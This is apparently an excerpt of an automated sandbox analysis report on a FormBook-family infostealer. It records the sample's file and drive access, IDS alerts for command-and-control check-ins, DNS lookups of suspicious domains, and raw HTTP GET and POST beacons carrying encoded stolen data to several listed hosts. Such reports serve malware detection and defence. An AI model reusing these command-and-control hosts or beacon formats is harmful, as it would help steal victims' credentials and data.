            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ, source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb- source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wmplayer.pdbGCTL source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wmplayer.pdb source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: C:\Windows\System32\unregmp2.exeFile opened: z:
            Source: C:\Windows\System32\unregmp2.exeFile opened: x:
            Source: C:\Windows\System32\unregmp2.exeFile opened: v:
            Source: C:\Windows\System32\unregmp2.exeFile opened: t:
            Source: C:\Windows\System32\unregmp2.exeFile opened: r:
            Source: C:\Windows\System32\unregmp2.exeFile opened: p:
            Source: C:\Windows\System32\unregmp2.exeFile opened: n:
            Source: C:\Windows\System32\unregmp2.exeFile opened: l:
            Source: C:\Windows\System32\unregmp2.exeFile opened: j:
            Source: C:\Windows\System32\unregmp2.exeFile opened: h:
            Source: C:\Windows\System32\unregmp2.exeFile opened: f:
            Source: C:\Windows\System32\unregmp2.exeFile opened: b:
            Source: C:\Windows\System32\unregmp2.exeFile opened: y:
            Source: C:\Windows\System32\unregmp2.exeFile opened: w:
            Source: C:\Windows\System32\unregmp2.exeFile opened: u:
            Source: C:\Windows\System32\unregmp2.exeFile opened: s:
            Source: C:\Windows\System32\unregmp2.exeFile opened: q:
            Source: C:\Windows\System32\unregmp2.exeFile opened: o:
            Source: C:\Windows\System32\unregmp2.exeFile opened: m:
            Source: C:\Windows\System32\unregmp2.exeFile opened: k:
            Source: C:\Windows\System32\unregmp2.exeFile opened: i:
            Source: C:\Windows\System32\unregmp2.exeFile opened: g:
            Source: C:\Windows\System32\unregmp2.exeFile opened: e:
            Source: C:\Windows\System32\unregmp2.exeFile opened: c:
            Source: C:\Windows\System32\unregmp2.exeFile opened: a:
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1BCA0 FindFirstFileW,FindNextFileW,FindClose,13_2_02E1BCA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then xor eax, eax13_2_02E09710
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then mov ebx, 00000004h13_2_033B0541

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59401 -> 89.31.143.90:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59407 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59408 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59410 -> 81.88.48.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59411 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59412 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59414 -> 156.251.142.105:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59416 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59417 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59419 -> 81.88.57.70:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59420 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59421 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59423 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59424 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59426 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59428 -> 152.32.156.214:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59429 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59430 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59432 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59433 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59434 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59436 -> 23.105.172.12:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59437 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59438 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59440 -> 185.151.30.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59441 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59442 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59445 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59446 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59447 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59449 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59450 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59451 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59453 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59454 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59455 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59457 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59458 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:59459 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59461 -> 46.235.40.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:59462 -> 89.31.143.90:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.vertilehub.xyz
            Source: Joe Sandbox ViewIP Address: 23.105.172.12 23.105.172.12
            Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.limpiezasbarcelo.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.top65s.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.videos60.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vertilehub.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.xuzfceth.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /expp/?Z6ZTG=4RP2jfjc/CKkP2k0VFIzhmOcoxlGKDo9u/ZkfjmOk/GcJdogV5u478VHpy4Tx1zZR2PffU9j3QXLxJ/zQp1CY/gImr6l8nbjZW8kbJ4UJqZmHhNvkenHenANmOUPEa0Yb7H7CBE=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.primefindsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.salecost.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bayviewcribbage.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficDNS traffic detected: DNS query: www.le-kuk.shop
            Source: global trafficDNS traffic detected: DNS query: www.limpiezasbarcelo.com
            Source: global trafficDNS traffic detected: DNS query: www.top65s.com
            Source: global trafficDNS traffic detected: DNS query: www.videos60.com
            Source: global trafficDNS traffic detected: DNS query: www.vertilehub.xyz
            Source: global trafficDNS traffic detected: DNS query: www.theestrellastore.com
            Source: global trafficDNS traffic detected: DNS query: www.xuzfceth.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: global trafficDNS traffic detected: DNS query: www.primefindsstore.shop
            Source: global trafficDNS traffic detected: DNS query: www.ecurtiscustoms.com
            Source: global trafficDNS traffic detected: DNS query: www.salecost.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.bayviewcribbage.com
            Source: unknownHTTP traffic detected: POST /utkc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.limpiezasbarcelo.comOrigin: http://www.limpiezasbarcelo.comConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 210Referer: http://www.limpiezasbarcelo.com/utkc/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 73 4f 77 7a 64 36 39 30 46 35 65 7a 51 72 70 31 77 34 4d 74 6b 4b 74 49 5a 61 79 6e 73 62 30 67 56 67 6c 74 38 64 69 2b 57 69 73 4c 4a 2b 78 6b 43 72 4a 55 32 4a 6b 38 4d 58 4b 48 53 6e 46 69 6e 4a 35 42 57 6e 4d 42 56 42 77 46 34 41 4a 2b 5a 33 34 4a 67 31 68 72 6f 49 51 59 32 37 4d 62 41 33 32 57 64 6c 62 4f 77 59 5a 56 73 50 4c 4d 52 6e 4d 30 33 6f 6f 55 4b 79 54 46 4b 64 43 4d 72 74 49 67 33 65 2f 31 35 50 51 68 79 4b 47 38 44 47 71 54 56 66 2b 2b 7a 64 50 32 4d 6e 76 4a 36 6e 6a 48 62 74 6a 43 79 58 6b 74 35 78 33 43 72 31 6f 4b 48 69 51 45 62 73 32 6b 66 6d 77 Data Ascii: Z6ZTG=8WKSZfXdpAc56sOwzd690F5ezQrp1w4MtkKtIZaynsb0gVglt8di+WisLJ+xkCrJU2Jk8MXKHSnFinJ5BWnMBVBwF4AJ+Z34Jg1hroIQY27MbA32WdlbOwYZVsPLMRnM03ooUKyTFKdCMrtIg3e/15PQhyKG8DGqTVf++zdP2MnvJ6njHbtjCyXkt5x3Cr1oKHiQEbs2kfmw
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
